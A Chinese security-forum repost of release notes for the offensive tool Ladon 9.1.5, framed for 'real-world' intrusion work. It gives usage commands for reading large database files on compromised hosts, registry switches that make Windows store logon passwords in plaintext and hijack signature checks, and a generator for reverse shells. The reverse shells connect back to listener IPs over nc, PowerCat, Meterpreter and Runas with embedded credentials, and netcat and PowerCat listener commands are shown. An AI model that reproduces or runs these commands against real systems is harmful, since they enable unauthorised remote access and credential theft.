设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 Ladon9.1.5大文件读取&反弹Shell生成器
返回列表 发新帖
查看: 2477|回复: 0

Ladon9.1.5大文件读取&反弹Shell生成器

[复制链接]
mxsillusion

141

主题

153

帖子

517

积分

高级会员

Rank: 4

积分
517
发表于 2022-5-28 15:05:48 | 显示全部楼层 |阅读模式
Ladon9.1.5大文件读取&反弹Shell生成器
原创 k8gege [url=]K8实验室[/url] 2022-04-20 00:20
收录于合集
#Ladon27个
#反弹Shell2个


Ladon9.1.5大文件读取&反弹Shell生成器原文链接:https://mp.weixin.qq.com/s?__biz ... e8343acbb61916b7#rd
9.1.5更新日志
LadonGUI 9.1.5 20220418[+]RevShell      反弹Shell命令生成(Ladon、NC、Perl、Bash、Python、PowerCat、Base64)Ladon 9.1.5 20220408[+]SetMzLogonPwd   修改注册表读取2012及后系统明文密码[+]SetSignAuth    修改注册表劫持签名签证[+]ReadFile      读取大文件前面指定长度内容(Ladon ReadFile c:\k8.exe 1024K)sc          修复SC添加启动项指定路径Bug
读取大文件指定长度内容(Ladon ReadFile c:\k8.exe 1024K)
实战中可能会遇到一些很大的文件,但是我们不知道此文件是否包含我们想要的数据,如数据库文件,数据量可能会很大,可能几G、几十G都有可能,上百G很少件,一般管理员为了速度快,也会优化成几十份几十G的文件。哪怕是一个文件10G,甚至才一两G,我们要落地才能确认的话,会很费时间,特别是目标网络或VPS网速不给力时,几分钟能搞定的事,我们得浪费几小时或几天,效率会非常低,最快确认内容的方法就是读取文件指定长度即可。实战读取单个30G文件也是秒开,很快就确认了MDF文件是否存储相关数据。文本文件返回明文内容,二进制文件,返回的可能是乱码,但问题不大,因为我们主要是要确定那些数据库或相关文件是否有关心的内容。


修改注册表读取2012及后系统明文密码
Usage: Ladon SetMzLogonPwd 1  开关1和0
编辑

修改注册表劫持签名签证
Usage: Ladon SetSignAuth 1  开关1和0
编辑


反弹Shell命令生成
虽然网上有很多文章或笔记,但有时候复制粘贴,网站可能会转义一些字符导致,复制的命令无法使用,就算能使用,也得替换IP和端口,有时测试某洞需要反弹,这条命令不行,又得换另外一条测试,折腾起来有点麻烦,为了方便,觉得还是有必要弄个生成器。麻烦的还有其它原因,如BASE64加密的BASH命令,替换完IP和端口还得加密,之前曾用的在线地址,TM的不能用,找到另外一个,生成的Payload不知道是那站点没添加引号还是被转义,导致无法使用。第一版(Ladon、NC、Perl、Bash、Python、PowerCat、Base64),后续会陆续完善添加各种反弹工具命令。
编辑

反弹TCP

Usage:
Ladon ReverseTcp ip port type
type: meter shell nc

监听nc shell
监听nc shell可用工具非常多,如NC、LadonGui、PowerCat、MSF等
nc -l -v -p 4444
LadonGui--Netcat--Listen
powercat -l -p 4444
编辑

反弹NC shell

Ladon ReverseTcp 192.168.1.8 4444 nc

编辑

LadonGui监听
编辑

常用NC监听
编辑

反弹MSF TCP Shell

Ladon ReverseTcp 192.168.1.8 4444 shell
正在上传…重新上传取消


反弹MSF TCP Meter

Ladon ReverseTcp 192.168.1.8 4444 meter
编辑

MSF成功反弹会话
编辑


反弹TCP/UDP (CMD & PowerShell)

Load PowerCat
Usage:
Reverse Tcp: Ladon PowerCat -r 192.168.1.110 4444 cmd
Reverse Tcp: Ladon PowerCat -r 192.168.1.110 4444 psh
Reverse Udp: Ladon PowerCat -r 192.168.1.110 4444 cmd -u
Reverse Udp: Ladon PowerCat -r 192.168.1.110 4444 psh -u

反弹TCP,PowerCat监听执行PowerShell
编辑
反弹HTTP/HTTPS

Usage:
Ladon ReverseHttp ip port
Ladon ReverseHttps ip port

MSF监听
windows/meterpreter/reverse_http
windows/meterpreter/reverse_https
反弹MSF HTTPS Meter

Ladon ReverseTcp 192.168.1.8 4444 meter

反弹HTTPS
编辑

MSF HTTPS监听会话
正在上传…重新上传取消

Runas反弹

Ladon Runas k8gege k8gege520 cmd.exe 192.168.1.110 4444
编辑

更多命令使用9.1.5生成器,http://k8gege.org/Ladon/ReverseShell.html

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-20 05:06 , Processed in 0.015135 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表